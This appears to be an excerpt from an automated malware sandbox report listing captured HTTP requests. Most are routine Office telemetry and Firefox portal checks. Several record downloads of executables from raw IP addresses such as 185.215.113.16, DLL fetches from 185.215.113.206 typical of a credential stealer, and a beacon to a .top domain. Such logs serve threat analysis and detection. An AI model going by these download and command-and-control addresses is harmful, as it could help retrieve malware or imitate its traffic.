                          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=195712-195712If-Range: 0x8DCEC757C1AD1D1
                          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
